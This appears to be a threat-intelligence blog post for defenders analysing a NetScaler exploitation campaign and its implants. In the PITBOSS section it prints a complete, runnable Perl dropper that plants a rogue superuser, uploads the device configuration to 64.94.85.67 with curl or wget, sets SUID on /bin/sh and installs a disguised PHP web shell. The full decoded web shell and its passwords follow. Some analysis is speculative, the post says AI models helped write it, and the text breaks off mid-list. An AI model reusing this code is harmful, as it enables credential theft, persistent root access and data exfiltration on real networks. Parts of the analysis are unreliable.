NOTE: This is an analysis of the artifacts and samples found during the hunt of SLAPSHOT, WHIPSHOT which is a Python tunneler used to proxy traffic into internal networks. The analysis is done using various AI Models and if you find any irrelevancy, please do report directly. This article is intended for Network Defenders, Threat Analysts, SOC and IT Administrators.
INDEX
- INTRODUCTION
- HOW IT IS CAUSED?
- CHAINING BOTH EXPLOITS
- SLAPSHOT: INTO THE PYTHON TUNNEL
- WHIPSHOT
- PLATYPUS AGENT
- PITBOSS SHELL
- THREAT INTELLIGENCE
- ATTACKERS ITW (IN THE WILD)
- HOW ATTACKERS TARGET POTENTIAL VICTIMS?
- PATCH ASAP
- CONCLUSION
- IOCs
INTRODUCTION
After observation of Active Exploitation of a 0-Day Vulnerability present in Citrix Netscalar ADC and Gateway, Citrix officially released the vulnerability details on September 27, 2026 on their Security Bulletin. 8 CVEs are assigned, however only 2 were exploited In The Wild. A CVSS Score of 9.5, which is too critical at this point.

- CVE-2026–88771: Unauthenticated RCE due to improper input validation
- CVE-2026–88772: Memory overflow leading to RCE or DoS
- CVE-2026–88773: HTTP Request Smuggling
- CVE-2026–88774: Feature policy bypass due to improper HTTP URL-based expression usage
- CVE-2026–88775: Memory overflow leading to unpredictable/erroneous behavior or DoS
- CVE-2026–88776: Memory overflow leading to unpredictable/erroneous behavior or DoS
- CVE-2026–88777: Memory overflow leading to unpredictable/erroneous behavior or DoS
- CVE-2026–88778: TCP Initial Sequence Number (ISN) prediction
Out of these, CVE-2026–88771 and CVE-2026–88772 were exploited in the wild. These are not direct attack, but requires multi-stage attack chain for successful exploitation.
- CVE-2026–88771: An attacker can exploit this input validation bug directly through standard web or authentication endpoints. It does not require any network memory overflow or DTLS connection to succeed.
- CVE-2026–88772: An attacker can target this memory buffer flaw over UDP to run code or crash the system without needing to touch the system log files or maintenance scripts.
HOW IT IS CAUSED?
STAGE 1: INITIAL ACCESS
Two parallel entry points (both lead to root):

Most common observed path:
- Attacker sends crafted requests (often via authentication endpoints like /nf/auth/doAuthentication.do).
- Malicious strings are written into NetScaler logs.
- The internal maintenance script ns_monuploadd_err.pl later processes those logs.
- Due to improper input validation, the script executes attacker-controlled commands as root.
STAGE 2: PRIVILEGE & PERSISTENCE
Once root is obtained, attackers typically run a post-exploitation script that:
- Creates a rogue superuser account (sec_monitor)
2. Sets SUID bit on /bin/sh (chmod 6555 /bin/sh)
3. Exfiltrates /flash/nsconfig (contains certificates, passwords, configs)
4. Modifies /etc/httpd.conf to treat non-script files (.deb, .sig, .ico, .local_journal) as PHP
STAGE 3: WEB SHELL & TUNNEL DEPLOYMENT
Attackers drop multiple tools for long-term access:

Web shells are usually accessible via legitimate-looking URLs such as:
/logon/LogonPoint/css/LogonUISimple.html.style.min.css
STAGE 4: POST-COMPROMISE ACTIVITY
- Internal reconnaissance
2. Credential theft
3. Lateral movement into the internal network (using the NetScaler’s IP as source)
4. Further tooling (Chisel, Sliver, etc.)
ATTACK FLOW SUMMARY
Unauthenticated Attacker
↓
CVE-2026–88772 (DTLS overflow) or CVE-2026–88771 (Log → Root)
↓
Root Shell on NetScaler
↓
Create backdoor user + SUID /bin/sh + Exfil config
↓
Deploy Web Shells (WHIPSHOT / .local_journal) + Tunnelers (SLAPSHOT / Platypus)
↓
Persistent Access + Internal Pivot
CHAINING BOTH EXPLOITS
Why Attackers Used Them Together:-
➼ Backup Options: Hackers use two different bugs at the same time so they have a backup plan if one entry point fails or gets blocked by security tools
➼ Different System Parts: CVE-2026–88771 attacks how the system handles logs and scripts, while CVE-2026–88772 attacks how the system processes network data packets
➼ No Direct Rule: An appliance can be safe from one bug but still vulnerable to the other depending on its settings and configuration
SLAPSHOT: INTO THE PYTHON TUNNEL
Slapshot is a Post-Exploitation implant / backdoor installer specifically built for compromised Citrix NetScaler ADC/Gateway appliances. It is the 2nd-stage implant that gets dropped after an attacker has already obtained root via CVE-2026–88771 or CVE-2026–88772.

During my investigation, 24 samples of Slapshot are found and extracted the vital path to make a YARA Detection Rule, included at the End of this Article.
It turns a NetScaler that already has root into a stealthy pivot point:
- Drops a local TCP session manager (the core of SLAPSHOT) that listens only on loopback
- Lets a remote operator open arbitrary outbound TCP connections from the NetScaler itself
- Because the connections originate from the appliance’s own NSIP/SNIP, they look like ordinary ADC traffic on the wire
- Places disguised web-shell receivers in the LogonPoint custom directory so the operator can talk to the local agent over HTTP
- Touches httpd.conf (with a backup) for persistence / handler changes so non-script extensions can be treated as PHP
COMPONENT BREAKDOWN
While analyzing the Slapshot Code, came across few components used in the codebase.
➼ agent.pl (Perl) — Local loopback TCP multiplexer. Supports open host:port, push/pull/exch (base64 data), close, ping. Sessions are kept in memory; data is base64-encoded over the local socket.
➼ bridge.pl — Tiny client that reads the port from /tmp/.uxdport and forwards a single base64 command to the agent.
➼ slapshot.py (Python 3) — More complete, multi-threaded reimplementation of the same protocol (open / push / pull / exch / close / stat / ping). Explicitly labeled as the SLAPSHOT-analog. Caps sessions, handles timeouts, coalesces reads, etc.
➼ The rest of the (truncated) script almost certainly continues with:
1) Dropping the PHP web shells (gated on the hardcoded token in cookies/headers)
2) Appending persistence to rc.netscaler / crontab
3) Modifying httpd.conf so .deb (and similar) files are executed as PHP
4) Possibly collecting and exfiltrating config, backups, and diagnostics to the hardcoded IP
WHIPSHOT
WHIPSHOT is a custom PHP web shell used in the 2026 Citrix NetScaler exploitation campaign (CVE-2026–88771 / CVE-2026–88772).
- Disguised appearance: Frequently dropped as non-PHP files such as .deb, .sig, .ico, or hidden files like .ctxs.receiver / .local_journal.
- Stealthy delivery: Attackers modify httpd.conf so the web server treats these non-script extensions as executable PHP.
- Access method: Commonly reachable via legitimate-looking paths (e.g. fake CSS URLs under /logon/LogonPoint/).
Capabilities:
Remote command execution
File upload / download
Acts as a bridge to launch or communicate with SLAPSHOT
Authentication: Some variants are password-protected (SHA-256 hashed passwords observed).
It is often deployed as:-
Unauthenticated Attacker ↓CVE-2026–88772 (DTLS overflow) or CVE-2026–88771 (Log → Root) ↓Root Shell on NetScaler ↓Modifies httpd.conf to enable PHP execution on non-standard extensions ↓Deploy WHIPSHOT to: /var/netscaler/logon/LogonPoint/custom/, /vpn/scripts/linux/
PLATYPUS AGENT
Platypus is typically used when the attacker wants a more robust, full-featured C2 channel instead of (or in addition to) a simple web shell + tunneler.
In our hunt, we have identified Platypus agent in the domain entretiensol.com. Some of the communicating files with this domain is a Platypus agent.
Attackers in this campaign used multiple tools in parallel. Platypus was one of the options for establishing stronger, longer-term control over the compromised appliance.
PITBOSS SHELL: BLINDING THE SERVICE
pitboss is an internal system daemon or watchdog process responsible for monitoring the health and availability of the NetScaler Packet Processing Engine in Citrix NetScaler.
NOTE: Generally, if an exploit payload causes a crash, the real “pitboss” watchdog immediately reboots the entire appliance — wiping out the attacker’s memory-resident shellcode.
To bypass this, advanced attackers write custom shellcode that actively disables the real pitboss monitoring loops by neutralizing system signals (like SIGSEGV or SIGBUS), forcing the system to merely respawn the process rather than rebooting, thereby preserving the web shell.
Here are the technical breakdowns of the same, which is written in Perl:-
MD5: bb724df37959c23a4ce6b5c5c374217e
SHA-1: fae85e4e10dda2f25cd023bf8e2e61432d33a7f5
SHA-256: 974b69782fdf5d67b97cfd508465939e44ee10798dbcc1e82b92d78776bad938
#!/usr/bin/perluse strict;use warnings;use strict; use warnings;use Digest::SHA qw(hmac_sha256);use MIME::Base64;use Digest::SHA qw(sha256_hex);my $user = 'sec_monitor';my $pass = 'ay#39&RGYvv4Xuzy';my $nsconf = '/flash/nsconfig/ns.conf';my $WS_FILE = '/var/netscaler/logon/LogonPoint/.local_journal';my $HTTPD = '/etc/httpd.conf';my $ws_pass = 'QI@UEG5PC7oRt31E';my $ws_hash = sha256_hex($ws_pass);sub pbkdf2 { my ($pw, $salt) = @_; my $u = hmac_sha256($salt . pack('N', 1), $pw); my $t = $u; for (2 .. 2500) { $u = hmac_sha256($u, $pw); $t ^= $u } substr($t, 0, 32);}open my $r, '<:raw', '/dev/urandom' or die "urandom: $!";read $r, my $salt, 32; close $r;my $hash = '5' . unpack('H*', $salt) . unpack('H*', pbkdf2($pass, $salt));my @lines;my $removed = 0;if (open my $cf, '<', $nsconf) { while (<$cf>) { if (/^(add|set|bind)\s+system\s+user\s+\Q$user\E(\s|$)/i) { $removed++; next; } push @lines, $_; } close $cf;}open my $fh, '>', $nsconf or die "open $nsconf: $!";print $fh @lines;print $fh "add system user $user $hash -encrypted\n";print $fh "bind system user $user superuser 100\n";close $fh;print "removed $removed old line(s) for $user\n" if $removed;print "done: $user written to $nsconf\n";print "reboot the appliance to activate.\n";my $server = '64.94.85.67';my $port = 443;my $src_dir = '/flash/nsconfig';my $tgz = '/tmp/update_result_3567cs.tgz';my $self = $0;die "Directory $src_dir not found\n" unless -d $src_dir;system("tar", "czf", $tgz, "-C", "/flash", "nsconfig") == 0 or die "tar failed: $?\n";my $url = "http://$server:$port/update_result_3567cs.tgz";my $rc;if (system("which curl >/dev/null 2>&1") == 0) { $rc = system("curl", "-s", "-o", "/dev/null", "--data-binary", "\@$tgz", "-H", "Content-Type: application/octet-stream", $url);} elsif (system("which wget >/dev/null 2>&1") == 0) { $rc = system("wget", "-q", "--post-file=$tgz", "--header=Content-Type: application/octet-stream", "-O", "/dev/null", $url);} else { die "Neither curl nor wget found\n";}if ($rc != 0) { unlink $tgz; die "Upload failed (exit $rc)\n";}unlink $tgz;unlink $self;chmod 06555, '/bin/sh';print "[+] chmod 6555 /bin/sh\n";system('mkdir', '-p', '/var/netscaler/logon/LogonPoint');my $ws_b64 = <<'B64';PD9waHAKJEtFWT0nZTRkOTA5YzI5MGQwZmIxY2EwNjhmZmFkZGYyMmNiZDAnOwpzZXNzaW9uX3N0YXJ0KCk7CmlmKGlzc2V0KCRfUE9TVFsnayddKSl7aWYoaGFzaCgnc2hhMjU2JywkX1BPU1RbJ2snXSk9PT0kS0VZKXskX1NFU1NJT05bJ29rJ109MTt9aGVhZGVyKCdMb2NhdGlvbjonLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddKTtleGl0O30KaWYoaXNzZXQoJF9HRVRbJ2xvZ291dCddKSl7c2Vzc2lvbl9kZXN0cm95KCk7aGVhZGVyKCdMb2NhdGlvbjonLnN0cnRvaygkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSwnPycpKTtleGl0O30KaWYoZW1wdHkoJF9TRVNTSU9OWydvayddKSl7Pz48IWRvY3R5cGUgaHRtbD48aHRtbD48aGVhZD48dGl0bGU+LjwvdGl0bGU+PHN0eWxlPgpib2R5e2JhY2tncm91bmQ6IzBkMTExNztkaXNwbGF5OmZsZXg7anVzdGlmeS1jb250ZW50OmNlbnRlcjthbGlnbi1pdGVtczpjZW50ZXI7aGVpZ2h0OjEwMHZoO2ZvbnQtZmFtaWx5Om1vbm9zcGFjZX0KZm9ybXtiYWNrZ3JvdW5kOiMxNjFiMjI7Ym9yZGVyOjFweCBzb2xpZCAjMzAzNjNkO2JvcmRlci1yYWRpdXM6OHB4O3BhZGRpbmc6MzBweDt0ZXh0LWFsaWduOmNlbnRlcn0KaW5wdXR7YmFja2dyb3VuZDojMGQxMTE3O2NvbG9yOiMwZjA7Ym9yZGVyOjFweCBzb2xpZCAjMzAzNjNkO3BhZGRpbmc6MTBweDtmb250LWZhbWlseTppbmhlcml0O2JvcmRlci1yYWRpdXM6NHB4O3dpZHRoOjI1MHB4fQpidXR0b257YmFja2dyb3VuZDojMjM4NjM2O2NvbG9yOiNmZmY7Ym9yZGVyOm5vbmU7cGFkZGluZzo4cHggMjBweDtmb250LWZhbWlseTppbmhlcml0O2JvcmRlci1yYWRpdXM6NHB4O2N1cnNvcjpwb2ludGVyO21hcmdpbi10b3A6MTBweH0KPC9zdHlsZT48L2hlYWQ+PGJvZHk+PGZvcm0gbWV0aG9kPXBvc3Q+PGlucHV0IHR5cGU9cGFzc3dvcmQgbmFtZT1rIHBsYWNlaG9sZGVyPSJwYXNzd29yZCIgYXV0b2ZvY3VzPjxicj48YnV0dG9uPkxvZ2luPC9idXR0b24+PC9mb3JtPjwvYm9keT48L2h0bWw+PD9waHAgZXhpdDt9CiRvPScnOwppZihpc3NldCgkX0dFVFsnZGwnXSkmJmlzX2ZpbGUoJF9HRVRbJ2RsJ10pKXtoZWFkZXIoJ0NvbnRlbnQtRGlzcG9zaXRpb246YXR0YWNobWVudDtmaWxlbmFtZT0iJy5iYXNlbmFtZSgkX0dFVFsnZGwnXSkuJyInKTtoZWFkZXIoJ0NvbnRlbnQtVHlwZTphcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0nKTtyZWFkZmlsZSgkX0dFVFsnZGwnXSk7ZXhpdDt9CmlmKGlzc2V0KCRfUE9TVFsnY21kJ10pJiYkX1BPU1RbJ2NtZCddIT09JycpeyRvPXNoZWxsX2V4ZWMoJF9QT1NUWydjbWQnXS4nIDI+JjEnKT86Jyc7fQppZihpc3NldCgkX0ZJTEVTWydmJ10pJiYkX0ZJTEVTWydmJ11bJ2Vycm9yJ109PTAmJiRfUE9TVFsncCddKXttb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1snZiddWyd0bXBfbmFtZSddLCRfUE9TVFsncCddKTskbz0idXBsb2FkZWQgLT4geyRfUE9TVFsncCddfSAoIi5maWxlc2l6ZSgkX1BPU1RbJ3AnXSkuIiBieXRlcykiO30KPz48IWRvY3R5cGUgaHRtbD48aHRtbD48aGVhZD48dGl0bGU+LjwvdGl0bGU+PHN0eWxlPgoqe2JveC1zaXppbmc6Ym9yZGVyLWJveDttYXJnaW46MDtwYWRkaW5nOjB9CmJvZHl7YmFja2dyb3VuZDojMGQxMTE3O2NvbG9yOiNjOWQxZDk7Zm9udC1mYW1pbHk6J0NvdXJpZXIgTmV3Jyxtb25vc3BhY2U7cGFkZGluZzozMHB4fQoucGFuZWx7YmFja2dyb3VuZDojMTYxYjIyO2JvcmRlcjoxcHggc29saWQgIzMwMzYzZDtib3JkZXItcmFkaXVzOjhweDtwYWRkaW5nOjIwcHg7bWFyZ2luLWJvdHRvbToyMHB4fQpoM3tjb2xvcjojNThhNmZmO21hcmdpbi1ib3R0b206MTJweDtmb250LXNpemU6MTRweDt0ZXh0LXRyYW5zZm9ybTp1cHBlcmNhc2U7bGV0dGVyLXNwYWNpbmc6MnB4fQppbnB1dFt0eXBlPXRleHRde3dpZHRoOjEwMCU7YmFja2dyb3VuZDojMGQxMTE3O2NvbG9yOiMwZjA7Ym9yZGVyOjFweCBzb2xpZCAjMzAzNjNkO3BhZGRpbmc6MTBweDtmb250LWZhbWlseTppbmhlcml0O2ZvbnQtc2l6ZToxNHB4O2JvcmRlci1yYWRpdXM6NHB4fQp0ZXh0YXJlYXt3aWR0aDoxMDAlO2JhY2tncm91bmQ6IzBkMTExNztjb2xvcjojOGI5NDllO2JvcmRlcjoxcHggc29saWQgIzMwMzYzZDtwYWRkaW5nOjEwcHg7Zm9udC1mYW1pbHk6aW5oZXJpdDtmb250LXNpemU6MTNweDtib3JkZXItcmFkaXVzOjRweDtyZXNpemU6dmVydGljYWx9Ci5idG57YmFja2dyb3VuZDojMjM4NjM2O2NvbG9yOiNmZmY7Ym9yZGVyOm5vbmU7cGFkZGluZzo4cHggMjBweDtmb250LWZhbWlseTppbmhlcml0O2ZvbnQtc2l6ZToxM3B4O2JvcmRlci1yYWRpdXM6NHB4O2N1cnNvcjpwb2ludGVyO21hcmdpbi10b3A6MTBweH0KLmJ0bjpob3ZlcntiYWNrZ3JvdW5kOiMyZWEwNDN9Ci5idG4tYmx1ZXtiYWNrZ3JvdW5kOiMxZjZmZWJ9LmJ0bi1ibHVlOmhvdmVye2JhY2tncm91bmQ6IzM4OGJmZH0KLmJ0bi1wdXJwbGV7YmFja2dyb3VuZDojODk1N2U1fS5idG4tcHVycGxlOmhvdmVye2JhY2tncm91bmQ6I2EzNzFmN30KLmJ0bi1yZWR7YmFja2dyb3VuZDojZGEzNjMzO2ZvbnQtc2l6ZToxMXB4O3BhZGRpbmc6NHB4IDEycHg7bWFyZ2luOjB9LmJ0bi1yZWQ6aG92ZXJ7YmFja2dyb3VuZDojZjg1MTQ5fQpocntib3JkZXI6bm9uZTtib3JkZXItdG9wOjFweCBzb2xpZCAjMzAzNjNkO21hcmdpbjoyNXB4IDB9Ci5yb3d7ZGlzcGxheTpmbGV4O2dhcDoxMHB4O2FsaWduLWl0ZW1zOmNlbnRlcjttYXJnaW4tdG9wOjhweH0KLnJvdyBpbnB1dFt0eXBlPXRleHRde2ZsZXg6MX0KLmZpbGUtem9uZXtib3JkZXI6MnB4IGRhc2hlZCAjMzAzNjNkO2JvcmRlci1yYWRpdXM6OHB4O3BhZGRpbmc6MzBweDt0ZXh0LWFsaWduOmNlbnRlcjttYXJnaW4tdG9wOjhweDtjdXJzb3I6cG9pbnRlcjt0cmFuc2l0aW9uOmJvcmRlci1jb2xvciAuMnN9Ci5maWxlLXpvbmU6aG92ZXJ7Ym9yZGVyLWNvbG9yOiM1OGE2ZmZ9Ci5maWxlLXpvbmUgaW5wdXR7ZGlzcGxheTpub25lfQouZmlsZS16b25lIHNwYW57Y29sb3I6IzhiOTQ5ZX0KLnRvcHtkaXNwbGF5OmZsZXg7anVzdGlmeS1jb250ZW50OmZsZXgtZW5kO21hcmdpbi1ib3R0b206MTBweH0KbGFiZWx7Y29sb3I6IzhiOTQ5ZTtmb250LXNpemU6MTJweH0KPC9zdHlsZT48L2hlYWQ+PGJvZHk+CjxkaXYgY2xhc3M9InRvcCI+PGEgaHJlZj0iP2xvZ291dCIgY2xhc3M9ImJ0biBidG4tcmVkIj5Mb2dvdXQ8L2E+PC9kaXY+Cgo8ZGl2IGNsYXNzPSJwYW5lbCI+CjxoMz5jb21tYW5kIGV4ZWN1dGlvbjwvaDM+Cjxmb3JtIG1ldGhvZD1wb3N0Pgo8aW5wdXQgdHlwZT10ZXh0IG5hbWU9Y21kIHZhbHVlPSI8Pz1odG1sc3BlY2lhbGNoYXJzKCRfUE9TVFsnY21kJ10/PycnKT8+IiBwbGFjZWhvbGRlcj0idHlwZSBjb21tYW5kIGhlcmUuLi4iIGF1dG9mb2N1cz4KPHRleHRhcmVhIHJvd3M9MTYgcmVhZG9ubHk+PD09aHRtbHNwZWNpYWxjaGFycygkbyk/PjwvdGV4dGFyZWE+CjxidXR0b24gY2xhc3M9ImJ0biIgdHlwZT1zdWJtaXQ+RXhlY3V0ZTwvYnV0dG9uPgo8L2Zvcm0+CjwvZGl2PgoKPGhyPgoKPGRpdiBjbGFzcz0icGFuZWwiPgo8aDM+ZmlsZSB0cmFuc2ZlcjwvaDM+CjxkaXYgc3R5bGU9ImRpc3BsYXk6ZmxleDtnYXA6MjBweCI+CjxkaXYgc3R5bGU9ImZsZXg6MSI+CjxsYWJlbD5VcGxvYWQ8L2xhYmVsPgo8Zm9ybSBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+CjxkaXYgY2xhc3M9ImZpbGUtem9uZSIgb25jbGljaz0idGhpcy5xdWVyeVNlbGVjdG9yKCdpbnB1dCcpLmNsaWNrKCkiPgo8aW5wdXQgdHlwZT1maWxlIG5hbWU9ZiBvbmNoYW5nZT0idGhpcy5wYXJlbnROb2RlLnF1ZXJ5U2VsZWN0b3IoJ3NwYW4nKS50ZXh0Q29udGVudD10aGlzLmZpbGVzWzBdLm5hbWUiPgo8c3Bhbj5jbGljayB0byBzZWxlY3QgZmlsZTwvc3Bhbj4KPC9kaXY+CjxkaXYgY2xhc3M9InJvdyI+CjxpbnB1dCB0eXBlPXRleHQgbmFtZT1wIHBsYWNlaG9sZGVyPSJkZXN0aW5hdGlvbiBwYXRoLCBlLmcuIC90bXAvcGF5bG9hZC5iaW4iPgo8YnV0dG9uIGNsYXNzPSJidG4gYnRuLWJsdWUiIHR5cGU9c3VibWl0PlVwbG9hZDwvYnV0dG9uPgo8L2Rpdj4KPC9mb3JtPgo8L2Rpdj4KPGRpdiBzdHlsZT0iZmxleDoxIj4KPGxhYmVsPkRvd25sb2FkPC9sYWJlbD4KPGZvcm0gbWV0aG9kPWdldD4KPGRpdiBjbGFzcz0icm93IiBzdHlsZT0ibWFyZ2luLXRvcDozMHB4Ij4KPGlucHV0IHR5cGU9dGV4dCBuYW1lPWRsIHBsYWNlaG9sZGVyPSJmaWxlIHBhdGgsIGUuZy4gL2V0Yy9wYXNzd2QiPgo8YnV0dG9uIGNsYXNzPSJidG4gYnRuLXB1cnBsZSIgdHlwZT1zdWJtaXQ+RG93bmxvYWQ8L2J1dHRvbj4KPC9kaXY+CjwvZm9ybT4KPC9kaXY+CjwvZGl2Pgo8L2Rpdj4KCjwvYm9keT48L2h0bWw+Cg==B64my $ws_content = decode_base64($ws_b64);$ws_content =~ s/e4d909c290d0fb1ca068ffaddf22cbd0/$ws_hash/;open my $fh2, '>', $WS_FILE or die "write $WS_FILE: $!\n";print $fh2 $ws_content;close $fh2;print "[+] webshell -> $WS_FILE\n";open my $rf, '<', $HTTPD or die "read $HTTPD: $!\n";my $conf = do { local $/; <$rf> };close $rf;if ($conf !~ /local_journal/) { my $patch = <<'PATCH'; <Files ".local_journal"> SetHandler application/x-httpd-php Header always set Cache-Control "no-store, no-cache, must-revalidate" Header always set Pragma "no-cache" </Files> Alias /logon/LogonPoint/css/LogonUISimple.html.style.min.css "/var/netscaler/logon/LogonPoint/.local_journal" AliasMatch ^/logon/LogonPoint/css/LogonUISimple\.html\.style\.min\.[0-9a-f]+\.css$ "/var/netscaler/logon/LogonPoint/.local_journal"PATCH $conf =~ s{( Alias /logon/ "/var/netscaler/logon/")}{$patch$1} or die "could not find Alias /logon/ line\n"; print "[+] injected Files + Alias + AliasMatch\n";}# flip php engine onif ($conf =~ s/php_flag engine off/php_flag engine on/g) { print "[+] php_flag engine on\n";}open my $wf, '>', $HTTPD or die "write $HTTPD: $!\n";print $wf $conf;close $wf;# ---- 4. reload httpd ----if (open my $pf, '<', '/var/run/httpd.pid') { chomp(my $pid = <$pf>); close $pf; if ($pid =~ /^\d+$/) { kill 'HUP', $pid; print "[+] httpd reloaded (HUP -> pid $pid)\n"; }} else { print "[!] /var/run/httpd.pid not found\n";}# ---- done ----print "\n";print "[*] url: https://<NSIP>/logon/LogonPoint/css/LogonUISimple.html.style.min.css\n";print "[*] pass: $ws_pass\n";
It is a multi-purpose rootkit/persistence installer that performs the following actions once the attacker already has root:
➼ Creates a rogue superuser account
➼ Exfiltrates the entire /flash/nsconfig directory
➼ Sets SUID on /bin/sh
➼ Drops a password-protected PHP web shell
➼ Patches httpd.conf so the web shell is accessible via a legitimate-looking CSS URL
➼ Reloads Apache
DETAILED BREAKDOWN
➼ STAGE 1: Rogue Admin Account
ACTION: Creates user sec_monitor
DETAILS: Hardcoded password: ay#39&RGYvv4Xuzy Uses NetScaler-style PBKDF2 hashing (2500 iterations) and writes it directly into /flash/nsconfig/ns.conf with superuser privileges
➼ STAGE 2: Config Exfiltration
ACTION: Steals full config
DETAILS: Creates a tarball of /flash/nsconfig and uploads it via HTTP POST to 64.94.85.67:443 as update_result_3567cs.tgz
➼ STAGE 3: SUID Backdoor
ACTION: chmod 6555 /bin/sh
DETAILS: Makes the system shell SUID-root so any future code execution runs as root
➼ STAGE 4: Web Shell Drop
ACTION: Writes to .local_journal
DETAILS: Drops a full-featured PHP web shell at: /var/netscaler/logon/LogonPoint/.local_journal Password: QI@UEG5PC7oRt31E (SHA-256 hashed inside the shell).
➼ STAGE 5: httpd.conf Patch
ACTION: Makes the shell accessible
DETAILS: Injects <Files> Alias, and AliasMatch rules so the web shell is reachable at a legitimate-looking CSS path: /logon/LogonPoint/css/LogonUISimple.html.style.min.css (and also via hashed CSS filenames). Also forces php_flag engine on.
➼ STAGE 6: Cleanup & Reload
ACTION: Self-deletes + reloads Apache
DETAILS: Deletes itself and sends HUP to httpd so the new configuration takes effect immediately
In this there is a Base 64 Encoded String which can be decoded as:-
<?php$KEY='e4d909c290d0fb1ca068ffaddf22cbd0';session_start();if(isset($_POST['k'])){if(hash('sha256',$_POST['k'])===$KEY){$_SESSION['ok']=1;}header('Location:'.$_SERVER['REQUEST_URI']);exit;}if(isset($_GET['logout'])){session_destroy();header('Location:'.strtok($_SERVER['REQUEST_URI'],'?'));exit;}if(empty($_SESSION['ok'])){?><!doctype html><html><head><title>.</title><style>body{background:#0d1117;display:flex;justify-content:center;align-items:center;height:100vh;font-family:monospace}form{background:#161b22;border:1px solid #30363d;border-radius:8px;padding:30px;text-align:center}input{background:#0d1117;color:#0f0;border:1px solid #30363d;padding:10px;font-family:inherit;border-radius:4px;width:250px}button{background:#238636;color:#fff;border:none;padding:8px 20px;font-family:inherit;border-radius:4px;cursor:pointer;margin-top:10px}</style></head><body><form method=post><input type=password name=k placeholder="password" autofocus><br><button>Login</button></form></body></html><?php exit;}$o='';if(isset($_GET['dl'])&&is_file($_GET['dl'])){header('Content-Disposition:attachment;filename="'.basename($_GET['dl']).'"');header('Content-Type:application/octet-stream');readfile($_GET['dl']);exit;}if(isset($_POST['cmd'])&&$_POST['cmd']!==''){$o=shell_exec($_POST['cmd'].' 2>&1')?:'';}if(isset($_FILES['f'])&&$_FILES['f']['error']==0&&$_POST['p']){move_uploaded_file($_FILES['f']['tmp_name'],$_POST['p']);$o="uploaded -> {$_POST['p']} (".filesize($_POST['p'])." bytes)";}?><!doctype html><html><head><title>.</title><style>*{box-sizing:border-box;margin:0;padding:0}body{background:#0d1117;color:#c9d1d9;font-family:'Courier New',monospace;padding:30px}.panel{background:#161b22;border:1px solid #30363d;border-radius:8px;padding:20px;margin-bottom:20px}h3{color:#58a6ff;margin-bottom:12px;font-size:14px;text-transform:uppercase;letter-spacing:2px}input[type=text]{width:100%;background:#0d1117;color:#0f0;border:1px solid #30363d;padding:10px;font-family:inherit;font-size:14px;border-radius:4px}textarea{width:100%;background:#0d1117;color:#8b949e;border:1px solid #30363d;padding:10px;font-family:inherit;font-size:13px;border-radius:4px;resize:vertical}.btn{background:#238636;color:#fff;border:none;padding:8px 20px;font-family:inherit;font-size:13px;border-radius:4px;cursor:pointer;margin-top:10px}.btn:hover{background:#2ea043}.btn-blue{background:#1f6feb}.btn-blue:hover{background:#388bfd}.btn-purple{background:#8957e5}.btn-purple:hover{background:#a371f7}.btn-red{background:#da3633;font-size:11px;padding:4px 12px;margin:0}.btn-red:hover{background:#f85149}hr{border:none;border-top:1px solid #30363d;margin:25px 0}.row{display:flex;gap:10px;align-items:center;margin-top:8px}.row input[type=text]{flex:1}.file-zone{border:2px dashed #30363d;border-radius:8px;padding:30px;text-align:center;margin-top:8px;cursor:pointer;transition:border-color .2s}.file-zone:hover{border-color:#58a6ff}.file-zone input{display:none}.file-zone span{color:#8b949e}.top{display:flex;justify-content:flex-end;margin-bottom:10px}label{color:#8b949e;font-size:12px}</style></head><body><div class="top"><a href="?logout" class="btn btn-red">Logout</a></div><div class="panel"><h3>command execution</h3><form method=post><input type=text name=cmd value="<?=htmlspecialchars($_POST['cmd']??'')?>" placeholder="type command here..." autofocus><textarea rows=16 readonly><==htmlspecialchars($o)?></textarea><button class="btn" type=submit>Execute</button></form></div><hr><div class="panel"><h3>file transfer</h3><div style="display:flex;gap:20px"><div style="flex:1"><label>Upload</label><form method=post enctype=multipart/form-data><div class="file-zone" onclick="this.querySelector('input').click()"><input type=file name=f onchange="this.parentNode.querySelector('span').textContent=this.files[0].name"><span>click to select file</span></div><div class="row"><input type=text name=p placeholder="destination path, e.g. /tmp/payload.bin"><button class="btn btn-blue" type=submit>Upload</button></div></form></div><div style="flex:1"><label>Download</label><form method=get><div class="row" style="margin-top:30px"><input type=text name=dl placeholder="file path, e.g. /etc/passwd"><button class="btn btn-purple" type=submit>Download</button></div></form></div></div></div></body></html>
This is a full-featured interactive PHP web shell that was embedded (base64-encoded) inside the Pitboss Shell Perl script.
This is a password-protected, session-based web shell with a clean dark UI. It provides three main capabilities: RCE, File Upload and File Download.
FEATURES
➼ Authentication: Password protected. Uses SHA-256 hash comparison
➼ Hardcoded Hash: e4d909c290d0fb1ca068ffaddf22cbd0
➼ Actual Password: QI@UEG5PC7oRt31E (this is the plaintext that hashes to the above value — taken from the Perl dropper)
➼ Session Handling: Uses PHP sessions ($_SESSION[‘ok’]). Login persists until logout
➼ Command Execution: shell_exec($_POST[‘cmd’] . ‘ 2>&1’) — runs any system command as the web server user (usually root on compromised NetScalers due to SUID /bin/sh)
➼ File Upload: Allows uploading a file to any path the process can write to
➼ File Download: Allows downloading any file by providing its path (?dl=/path/to/file)
➼ UI: Dark GitHub-style interface with monospace font. Looks relatively modern for a web shell
THREAT INTELLIGENCE
The initial anchor point was the IOC present in the Pitscalar, where a domain has been found which is used by threat actors to distribute malware and manage compromised servers.
entretiensol[.]com
While digging the communication files, 6 Shells were found which were communicating from 29th September to 5th October 2026.
MD5 HASH: FILE NAME: FILE SIZE==============================4b171153bf0a462c7eb4643ad6386af6 : puyxpiite.exe : 6.79 KB e8ddc1169e813ab3cd6a3874a7411f49 : mjlkp0h.exe : 151 B c6e5b2c2a4c174b22dc3a1f32a8cc7cd : 4risj.exe : 6.80 KB 034a721824243c02adf3afb0d7dfb05d : dc211.exe : 7.47 KB 86ba31f9dc599999725b4d87b045f92f : x.bin : 151 B d19e73e09035b8c28202fffe0b367de7 : li29c.exe : 7.46 KB
As this 0-Day Exploitation started in September 2026, we got 3 samples (MD5 Hash) which is matching with the same timeline (as per VT):-
